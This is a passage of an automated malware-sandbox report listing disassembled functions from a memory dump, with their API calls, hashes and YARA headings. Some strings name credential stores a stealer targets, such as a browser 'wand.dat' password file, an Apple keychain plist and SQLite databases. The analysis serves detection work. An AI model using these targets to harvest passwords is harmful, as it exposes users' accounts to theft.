                                                                                                                                                                    • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81
                                                                                                                                                                    • Part of subcall function 004088A0: GetOpenFileNameW.COMDLG32(?), ref: 004088E9
                                                                                                                                                                    • Part of subcall function 004088A0: wcscpy.MSVCRT ref: 004088F7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                                                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                                                                                  • API String ID: 3589925243-1828844352
                                                                                                                                                                  • Opcode ID: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
                                                                                                                                                                  • Instruction ID: 189ab15ad594b46ceda1379ae2a6b1c5413d0dce04db73f13dfcb8633a17526e
                                                                                                                                                                  • Opcode Fuzzy Hash: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
                                                                                                                                                                  • Instruction Fuzzy Hash: 0841B771600205AFEF10EF61DD86ADE77B5FF40314F10802BFA05A71D2EB79A9958B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E482, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
                                                                                                                                                                    • Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040E4B0
                                                                                                                                                                  • _wtoi.MSVCRT ref: 0040E4BC
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040E50A
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040E51B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1549203181-0
                                                                                                                                                                  • Opcode ID: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
                                                                                                                                                                  • Instruction ID: a8ded69f91e0d7bf63f89fae3ec1b4bc8203dfd4cc2a8694f23455ab63246b5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
                                                                                                                                                                  • Instruction Fuzzy Hash: 06417131900204EFCF21DF9AC980A99B7B5EF48358F1548BAEC05EB396E738DA509B55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406EB9, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemsetstrlen
                                                                                                                                                                  • String ID: Ap@$Ap@
                                                                                                                                                                  • API String ID: 160209724-724177859
                                                                                                                                                                  • Opcode ID: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
                                                                                                                                                                  • Instruction ID: e2bdeeadc1d90758f2de231e66b6cadccfeb655152d102dc9dd3295dcddd65f9
                                                                                                                                                                  • Opcode Fuzzy Hash: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 10313371A042069BDB14DFA8AC80BAFB7B89F04310F1100BEE916F72C1DB78DA518769
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F843, Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040F882
                                                                                                                                                                    • Part of subcall function 004087A4: ShellExecuteW.SHELL32(?,open,?,Function_0004552C,Function_0004552C,00000005), ref: 004087BA
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040F8F2
                                                                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 0040F90C
                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0040F938
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3550944819-0
                                                                                                                                                                  • Opcode ID: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
                                                                                                                                                                  • Instruction ID: 0cce36cd3d59050ebbb4ae1468268e07e9567f629d0a6bc52b2b72a07dc00bda
                                                                                                                                                                  • Opcode Fuzzy Hash: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
                                                                                                                                                                  • Instruction Fuzzy Hash: 7041C375500305EBDB30AF15CC88B9673B4EF50325F10857AE9686BAE2C7B8AD89CB14
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040CD44, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$free
                                                                                                                                                                  • String ID: Z6@
                                                                                                                                                                  • API String ID: 2888793982-1638572689
                                                                                                                                                                  • Opcode ID: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
                                                                                                                                                                  • Instruction ID: 1cd3d00781b25d2b94616f77ccd2c248328d95a28ed1044bfffefbc926401994
                                                                                                                                                                  • Opcode Fuzzy Hash: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
                                                                                                                                                                  • Instruction Fuzzy Hash: EB219034500605EFCB60DF29C98185ABBF6FF84314720467EE852E3790E739EE019B44
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410174, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                                                                  • Opcode ID: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
                                                                                                                                                                  • Instruction ID: 2b976a00fcfd181f23c33ae21356c60783d23841694cc8dee0d8ac2aa3eeffc6
                                                                                                                                                                  • Opcode Fuzzy Hash: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
                                                                                                                                                                  • Instruction Fuzzy Hash: EA112BB29003057BDB249F15D884DEA77A9EBA0344700062FFD0696251F6BDDED9C7D8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040943C, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                  • Opcode ID: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
                                                                                                                                                                  • Instruction ID: d0afff18851916bdc62762cc26ce26f97abfa6c0527030a4abc257fe2447681f
                                                                                                                                                                  • Opcode Fuzzy Hash: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F114F712046019FE328DF1DC881A27F7E5EFD9304B21892EE59A97386DB39E802CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413D78, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00413DA4
                                                                                                                                                                    • Part of subcall function 004089E1: _snwprintf.MSVCRT ref: 00408A26
                                                                                                                                                                    • Part of subcall function 004089E1: memcpy.MSVCRT ref: 00408A36
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00413DCD
                                                                                                                                                                  • memset.MSVCRT ref: 00413DD7
                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004552C,?,00002000,?), ref: 00413DF9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1127616056-0
                                                                                                                                                                  • Opcode ID: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
                                                                                                                                                                  • Instruction ID: e0c1f09ad2cb5d60bcfcc92858fd4079171207d9a16d9363f081e68af551c4db
                                                                                                                                                                  • Opcode Fuzzy Hash: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 4D1165B2500129BFEF11AF64DC06EDE7B79EF44711F10006AFB05B2151EA359A608F9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004146B4, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 004146C4
                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004146F6
                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0041470A
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041471D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3917621476-0
                                                                                                                                                                  • Opcode ID: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
                                                                                                                                                                  • Instruction ID: 097f193ff7923ae7587a5e446372f032271e9f174675921af37de08819f90ac7
                                                                                                                                                                  • Opcode Fuzzy Hash: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
                                                                                                                                                                  • Instruction Fuzzy Hash: EC11FAB5900208AFDB00DFA9D988AEEB7FCFB49304F10406AE515E7240D738DB45CB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042F6EF, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                  • String ID: sqlite_master
                                                                                                                                                                  • API String ID: 438689982-3163232059
                                                                                                                                                                  • Opcode ID: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
                                                                                                                                                                  • Instruction ID: df29f02e372fce164f73cef38905b10b73feda933693282389fd2907aeed520f
                                                                                                                                                                  • Opcode Fuzzy Hash: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B01F572900618BAEB11BBA0CC42FDEB77DFF45315F50005AF60062042DB79AA148B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E7F0, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                    • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                    • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040E81D
                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040E882
                                                                                                                                                                    • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                    • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040E848
                                                                                                                                                                  • wcscat.MSVCRT ref: 0040E85B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 822687973-0
                                                                                                                                                                  • Opcode ID: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
                                                                                                                                                                  • Instruction ID: fc9a9cbfa579f1f3c21001c0e8c570231a458ca756af8d40dec707b0d2905b79
                                                                                                                                                                  • Opcode Fuzzy Hash: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
                                                                                                                                                                  • Instruction Fuzzy Hash: 540188B650070466F720F7A6DC86FAB73ACDB80704F14047AB719F21C2D679A9514A6D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00416D4F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76D25970,?,00416E7A,?), ref: 00416D6D
                                                                                                                                                                  • malloc.MSVCRT ref: 00416D74
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76D25970,?,00416E7A,?), ref: 00416D93
                                                                                                                                                                  • free.MSVCRT(00000000,?,76D25970,?,00416E7A,?), ref: 00416D9A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2605342592-0
                                                                                                                                                                  • Opcode ID: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
                                                                                                                                                                  • Instruction ID: bcab52b9ccbc4c9bc02d63d2584d5636d902a6cb4a382b6ea3df8204de1a5a00
                                                                                                                                                                  • Opcode Fuzzy Hash: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF089B260E22D7F7B102A75ACC0D7BBB9CDB862FDB21072FF514A1190D9199C015675
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004081EA, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32 ref: 004081F8
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00408210
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00408226
                                                                                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00408249
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Item
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3888421826-0
                                                                                                                                                                  • Opcode ID: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
                                                                                                                                                                  • Instruction ID: eb915db23c4b1ca38ea3c1988d88bb83aba39799d6a265b66449fd7df9afb7a9
                                                                                                                                                                  • Opcode Fuzzy Hash: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
                                                                                                                                                                  • Instruction Fuzzy Hash: 10F06975A0050CBFDB018F948E81CAFBBB9EB49784B2000BAF504E6150D6709E01AA61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417479, Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00417496
                                                                                                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004174B6
                                                                                                                                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004174C2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004174D0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3727323765-0
                                                                                                                                                                  • Opcode ID: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
                                                                                                                                                                  • Instruction ID: 68256e963451342af1775745e88af25fe573ff9f394a0ba2c0bbd214266e5fb2
                                                                                                                                                                  • Opcode Fuzzy Hash: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7701F435504608BFDB219FA0DC84D9B7FBCFB80705F20843AF942D6050D6349984CB74
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401C43, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00401C64
                                                                                                                                                                    • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                  • wcslen.MSVCRT ref: 00401C7D
                                                                                                                                                                  • wcslen.MSVCRT ref: 00401C8B
                                                                                                                                                                    • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
                                                                                                                                                                  • String ID: Apple Computer\Preferences\keychain.plist
                                                                                                                                                                  • API String ID: 3183857889-296063946
                                                                                                                                                                  • Opcode ID: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
                                                                                                                                                                  • Instruction ID: eecd7d3c3de4f02ea7dbe6204318003872b6068ab845989257e2c34d03a92ed5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
                                                                                                                                                                  • Instruction Fuzzy Hash: 08F0F9B250531866FB20A755DC8AFDA73AC9F01314F2001B7E914E20C3FB7CD944469D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040CEF9, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040CF1E
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00445ADC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040CF37
                                                                                                                                                                  • strlen.MSVCRT ref: 0040CF49
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040CF5A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                  • Opcode ID: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
                                                                                                                                                                  • Instruction ID: 14800c8a4aa59548f5ab429dc5ca7c2185fd5422b2c87da3b8dfa48c6c6ad4f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
                                                                                                                                                                  • Instruction Fuzzy Hash: 13F01DB780122CBFFB059B94DCC9EEB776CDB09254F0001A6B709E2052DA749E448BB8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040CE8A, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040CEAF
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040CECC
                                                                                                                                                                  • strlen.MSVCRT ref: 0040CEDE
                                                                                                                                                                  • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040CEEF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                  • Opcode ID: 9c577301d423554223bdd3630099943bbc335e058c45f1b75860cbc1b2ab4647
                                                                                                                                                                  • Instruction ID: 5ca945b9895027beb3426ea3ebb999d168a71141a618eb4a8136c4c05ef02c5a
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c577301d423554223bdd3630099943bbc335e058c45f1b75860cbc1b2ab4647
                                                                                                                                                                  • Instruction Fuzzy Hash: 40F062B680152C7FEB81A794DC81EEB776CEB05258F0041B2B749D2041DD349E084F7C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413A55, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040840D: memset.MSVCRT ref: 0040842C
                                                                                                                                                                    • Part of subcall function 0040840D: GetClassNameW.USER32 ref: 00408443
                                                                                                                                                                    • Part of subcall function 0040840D: _wcsicmp.MSVCRT ref: 00408455
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00413A7C
                                                                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 00413A8A
                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00413A98
                                                                                                                                                                  • GetStockObject.GDI32(00000000), ref: 00413AA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 764393265-0
                                                                                                                                                                  • Opcode ID: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
                                                                                                                                                                  • Instruction ID: 110bd5b637e4d79b17592fdcf208372bccb43cad252910099e33a416a39d1a4b
                                                                                                                                                                  • Opcode Fuzzy Hash: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0C839100208BBCF216F60DC05ACE3F21AF05362F104136F914541F2CB759A90DB4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408D10, Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408D2C
                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 00408D3C
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00408D4B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 979780441-0
                                                                                                                                                                  • Opcode ID: d8f3a09722eadbc74da9c95b8a3510df0f65f7c1f1d0afca8fe4e111664d8614
                                                                                                                                                                  • Instruction ID: ec3377692345dfa8f7b5f00acb1c953adbf394747b85e28386a557f9ea6599fc
                                                                                                                                                                  • Opcode Fuzzy Hash: d8f3a09722eadbc74da9c95b8a3510df0f65f7c1f1d0afca8fe4e111664d8614
                                                                                                                                                                  • Instruction Fuzzy Hash: F4F05E769005199BEF119BA0DC49BBFB3FCBF1670AF008529E052E1090DB74D0048B64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004116B2, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memcpy.MSVCRT ref: 004116CC
                                                                                                                                                                  • memcpy.MSVCRT ref: 004116DE
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004116F1
                                                                                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000113C8,00000000), ref: 00411705
                                                                                                                                                                  Memory Dump Source
